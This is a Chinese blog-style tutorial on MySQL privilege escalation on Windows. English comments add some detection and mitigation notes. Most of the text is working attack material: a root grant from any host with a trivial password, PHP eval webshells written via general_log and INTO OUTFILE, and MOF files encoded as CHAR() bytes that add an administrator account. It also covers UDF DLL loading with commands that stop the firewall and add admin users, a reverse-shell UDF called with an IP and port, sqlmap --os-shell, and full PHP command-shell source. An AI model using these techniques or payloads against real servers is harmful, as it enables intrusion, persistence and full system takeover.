最近在复习mysql提权,所以正好写篇文章总结一下关于mysql的常见提权姿势
相关操作
select @@version; 查询数据库版本
select @@basedir; 查询MYSQL安装路径
select @@plugin_dir ; 查看plugin路径
select host, user, password from mysql.user; 查询hash (MySQL <= 5.6 )
select host, user, authentication_string from mysql.user; 查询hash (MySQL >= 5.7 )
select @@version_compile_os,@@version_compile_machine; 查询当前操作系统
secure-file-priv 读写权限
secure_file_priv=NULL -- 限制mysqld不允许导入导出
secure_file_priv=/path/ -- 限制mysqld的导入导出只能发生在指定的/path/目录下
secure_file_priv='' -- 不对mysqld的导入导出做限制
添加写权限
1.show variables like '%secure%';
2.修改my.ini 插入 secure-file-priv=""
mysql开启远程连接
use mysql;
-- NOTE(review): this opens the superuser account to every host ('%') with a
-- trivial password and GRANT OPTION. It is exactly what makes the service
-- reachable and brute-forceable from the network (the mysql_login scanner
-- further down this page relies on it). Hardening: host-restricted accounts,
-- a bind-address, a strong password. IDENTIFIED BY inside GRANT is 5.x syntax;
-- MySQL 8.0 rejects it and requires CREATE USER first.
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%'IDENTIFIED BY 'root' WITH GRANT OPTION;
flush privileges;
1、通过mysql日志功能
-- Redirects the general query log into the web root so that a later SELECT
-- lands in a .php file. Needs SUPER (SYSTEM_VARIABLES_ADMIN on 8.0) and a
-- mysqld process that can write to the web root; secure_file_priv is not
-- consulted for general_log_file, so the restriction described above does
-- not stop this path.
SHOW VARIABLES LIKE 'general%' 查询日志
-- Detection: alert on SET GLOBAL general_log_file pointing outside the
-- configured log directory and on general_log being toggled at runtime.
-- Mitigation: run mysqld under an account with no write access to web roots.
set global general_log = "ON"; 开启日志记录
set global general_log_file='C://phpStudy//PHPTutorial//WWW//shell.php'; 设置日志路径
-- From here on every statement text is appended to shell.php, including this one.
select '<?php @eval($_POST[1]);?>'; 写入一句话
![051872f72cb5c2966f10f4d037e8a8c0.png](https://i-blog.csdnimg.cn/blog_migrate/571b21f8920661b719a1a67eead02cb1.jpeg)
![03071f937c581f8540a3bd4a840ea732.png](https://i-blog.csdnimg.cn/blog_migrate/e9bdefe46fc5656ba21b42f6c943a5a1.jpeg)
连接成功
2、mof提权
1.原理
在 c:/windows/system32/wbem/mof/目录下的 nullevt.mof 每分钟都会有一个特定的时间去执行一次
(由"And TargetInstance.Second = 5";控制,这里输入5就是每分钟的第五秒执行。一会 mof 文件我会分享的。),那么把 cmd 命令添加到 nullevt.mof 中,cmd 命令就会自动执行了。
2.mof代码
2.1添加用户
// WMI permanent event subscription written as MOF: a filter, a consumer and
// the binding that joins them are registered under root\subscription.
// Defender notes: list existing bindings with
//   Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding
// and watch for their creation (Sysmon event IDs 19/20/21, WMI-Activity
// operational log). Auto-compilation of files dropped into wbem\mof is
// reported only for XP/2003-era builds — TODO confirm on the target version.
// The namespace path and the JScript string escapes below look mangled by the
// page rendering; the CHAR() form further down carries the raw bytes.
#pragma namespace(".rootsubscription")
// Filter: fires on each Win32_LocalTime modification whose Second == 5,
// i.e. once a minute (the article says this value controls the timing).
instance of __EventFilter as $EventFilter
{
EventNamespace = "RootCimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa "Win32_LocalTime" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
// Consumer: JScript via WScript.Shell running `net.exe user admin admin /add`,
// i.e. it creates a local user. Script consumers run inside the WMI script
// host, presumably as SYSTEM — that is the privilege escalation.
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe user admin admin /add")";
};
// Binding: without it the filter and consumer are inert; this object is the
// best single detection point.
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
2.2添加用户到管理员
// Second subscription, identical to the first except that the consumer runs
// `net.exe localgroup administrators admin /add` (promotes the user created by
// the previous MOF). Filter and consumer reuse Name = "filtP2" / "consPCSV2";
// since these classes are keyed on Name, compiling this file presumably
// replaces the earlier objects rather than adding to them — confirm.
// Detection/mitigation are the same: monitor __FilterToConsumerBinding
// creation (Sysmon 19/20/21, WMI-Activity log).
#pragma namespace(".rootsubscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "RootCimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa "Win32_LocalTime" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe localgroup administrators admin /add")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
3.写入mof文件
3.1写入“添加用户”
SELECT CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100
,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
3.2写入“添加到管理员”
select char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into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
3、udf提权
利用步骤:
3.1 创建目录
Mysql<5.0,导出路径随意;
5.0<MySQL<5.1,则需要导出至目标服务器的系统目录(c:/windows/system32/)
MySQL>=5.1,udf.dll必须放到mysql安装目录的lib\plugin文件夹才能创建自定义函数,该目录默认不存在,需要自己创建
查询版本:
select @@version;
查看plugin路径:
show variables like '%plugin%';
select @@plugin_dir;
查找MYSQL目录:
select @@basedir;
利用NTFS ADS创建目录
select 'xxx' into dumpfile 'C:phpStudyPHPTutorialMySQLlib::$INDEX_ALLOCATION';
select 'xxx' into dumpfile 'C:phpStudyPHPTutorialMySQLlibplugin::$INDEX_ALLOCATION';
3.2 写入dll文件
select 0x4D5A90000300000004000000FFFF.... into dumpfile 'C:phpStudyPHPTutorialMySQLlibpluginlib_mysqludf_sys.dll'
其他写法
CREATE TABLE udftmp (c blob); //新建一个表,名为udftmp,用于存放本地传来的udf文件的内容。
INSERT INTO udftmp values(unhex(‘udf文件的16进制格式‘)); //在udftmp中写入udf文件内容
SELECT c FROM udftmp INTO DUMPFILE
'C:phpStudyPHPTutorialMySQLlibpluginlib_mysqludf_sys.dll'
select unhex(十六进制)
select 0x十六进制
select char(77,90,144...)
lib_mysqludf_sys.dll文件可以从sqlmap解密获取
在sqlmap/extra/cloak/路径下
python3 .cloak.py -d -i ....dataudfmysqlwindows64lib_mysqludf_sys.dll_
会在sqlmapdataudfmysqlwindows64目录下生成lib_mysqludf_sys.dll
以16进制保存,在本地mysql执行
select hex(load_file('c:lib_mysqludf_sys.dll')) into dumpfile 'c://1.txt'
也可以利用sqlmap上传dll
sqlmap.py -d mysql://root:root@127.0.0.1:3306/test --file-write=d:/lib_mysqludf_sys.dll --file-dest=C:phpStudyPHPTutorialMySQLlibpluginlib_mysqludf_sys.dll
3.3 创建函数
-- Registers the UDF from the DLL that was dropped into @@plugin_dir (MySQL >= 5.1
-- only loads from there, as noted above). Requires the INSERT privilege on the
-- mysql schema (mysql.func). Mitigation: run mysqld under a low-privilege
-- service account and keep plugin_dir non-writable by that account — the UDF
-- then executes with no more rights than the service itself. Detection: new
-- rows in mysql.func and new files appearing in plugin_dir.
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll'
查看用户自定义函数: select * from mysql.func;
![d0ea41572b96c6c839a4c382802dcdfe.png](https://i-blog.csdnimg.cn/blog_migrate/d1a49907c79304d6ec8f43d2829185c9.png)
3.4 执行命令
select sys_eval('ipconfig');
select sys_eval('net stop policyagent'); 关闭防火墙
select sys_eval('net user admin admin /add'); 添加用户
select sys_eval('net localgroup administrators admin /add'); 将用户加到管理组
drop function sys_eval; 删除函数
![9c2da72aee21b749665202f5833a6dba.png](https://i-blog.csdnimg.cn/blog_migrate/c1e23713adb4958e3813a782cca1c637.png)
4、msf
use auxiliary/scanner/mysql/mysql_login 尝试登录
![7b046b1162a5fb072e37f35e733c694a.png](https://i-blog.csdnimg.cn/blog_migrate/08d551f084f40aff12d12eacee908e52.jpeg)
use exploit/multi/mysql/mysql_udf_payload udf提权
![c3b61bf2d164b999ffc5a6e7feaea208.png](https://i-blog.csdnimg.cn/blog_migrate/049da1f869f9f3c15f21910e27a0deb7.jpeg)
use exploit/windows/mysql/mysql_mof mof提权
![47669206a0c99e39eab4851f2f668746.png](https://i-blog.csdnimg.cn/blog_migrate/b511bbee35b31e139d07ef8c928df814.jpeg)
5.反弹端口连接提权
相当于UDF提权的另类用法,创建反弹shell的函数,用于反弹cmdshell
select 0x4d5a4b45524e454c33322e444c4....... #代码太长,链接在下方
into DUMPFILE 'C:phpStudyPHPTutorialMySQLlibpluginudf.dll'
CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';
select backshell('');
select backshell("192.168.12.1",4444);
backshell.txt 提取码:mu88
![d43137c609d199c6d17cfc7f023483d5.png](https://i-blog.csdnimg.cn/blog_migrate/c997e5e280f6eaa72549cfe8c47a739c.jpeg)
![437785ac7c3ae5883c08acb09a03465d.png](https://i-blog.csdnimg.cn/blog_migrate/bd32ad5e60c9b9f0a9336724d069ed02.jpeg)
![88502097aa6652e2726f92fef947c695.png](https://i-blog.csdnimg.cn/blog_migrate/649806f3b31cdad9ee817c574515e2f0.jpeg)
成功反弹shell
6、文件写入
写入一句话木马
select '<?php @eval($_POST[1])?>' into outfile 'C:phpStudyPHPTutorialWWW1.php'
![c894f02f596a614d8efbdff5bffaa3d0.png](https://i-blog.csdnimg.cn/blog_migrate/880fdd605965ae9c2a8b5cff02ed0e73.jpeg)
执行成功
7、os-shell
前提条件:需要知道网站绝对路径,有写权限
1.sqlmap -u http://192.168.12.17/sql/Less-1/?id=1 --os-shell
![307bed0ee058c2a7d0c109d3dc3f9a19.png](https://i-blog.csdnimg.cn/blog_migrate/e031d1b8378e5c303b5a27d246058cac.jpeg)
![01880871ac639ab580d54d5d91f89945.png](https://i-blog.csdnimg.cn/blog_migrate/b0a694020cb5d22580fe4605e45a3de1.jpeg)
2.选择php(4)
3.custom location(2)
4.输入绝对路径:C:phpStudyPHPTutorialWWWsql
5.连接成功,这时候可以执行命令了,尝试执行ipconfig,发现执行成功
![1142433077816532ae92e99006e61fe5.png](https://i-blog.csdnimg.cn/blog_migrate/39ee3df3b5f4e7ecf948d865e47abb78.jpeg)
分析:
通过 burp 代理抓包,分析并复现上述过程
sqlmap -u http://192.168.12.17/sql/Less-1/?id=1 --os-shell --proxy=http://127.0.0.1:8080
![08377495a464301e1ad2b16c497d9a8c.png](https://i-blog.csdnimg.cn/blog_migrate/fafd6a71a46ef568b6384d8f710ca0e3.jpeg)
对数据包进行解码
id=-6947' OR 4810=4810 LIMIT 0,1 INTO OUTFILE
'C:/phpStudy/PHPTutorial/WWW/tmpuwkqc.php' LINES TERMINATED BY
<?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if
(phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_fi
le($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or
die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["
tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File
uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST
enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE
value=1000000000><b>sqlmap file uploader</b><br>
<input name=file type=file><br>
to directory: <input type=text name=uploadDir
value=C:phpStudyPHPTutorialWWW> <input type=submit name=upload
value=upload></form>";}?>
--
发现第一个数据包是写入一个带有文件上传功能的php
![c79142d4c8c01a98290a850532df06ff.png](https://i-blog.csdnimg.cn/blog_migrate/089d70023dd78dee9bd72a8cff2d1bd3.png)
分析第二数据包
![d6f50cee0dec1c118904fc8af5584192.png](https://i-blog.csdnimg.cn/blog_migrate/d7932a77ad2ed3db55f6f600b73f79b5.jpeg)
通过刚才文件写入的php上传了一个cmd马
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$z=@ini_get("disable_functions");if(!empty($z)){$z=preg_replace("/[, ]+/",',',$z);$z=explode(',',$z);$z=array_map("trim",$z);}else{$z=array();}$c=$c." 2>&1n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f("system")){ob_start();system($c);$w=ob_get_clean();}elseif(f("proc_open")){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f("shell_exec")){$w=shell_exec($c);}elseif(f("passthru")){ob_start();passthru($c);$w=ob_get_clean();}elseif(f("popen")){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f("exec")){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}echo"<pre>$w</pre>";?>
然后进行命令执行
![ffa82d99e5b7212c3048f53250f6a7fb.png](https://i-blog.csdnimg.cn/blog_migrate/5fc7ca2372e85cceec429257a912f6eb.jpeg)
![d3dcec12001f37dc52cf42d573064072.png](https://i-blog.csdnimg.cn/blog_migrate/d99d0a44de16a4b76d9cd7078f8de3f0.jpeg)
命令执行成功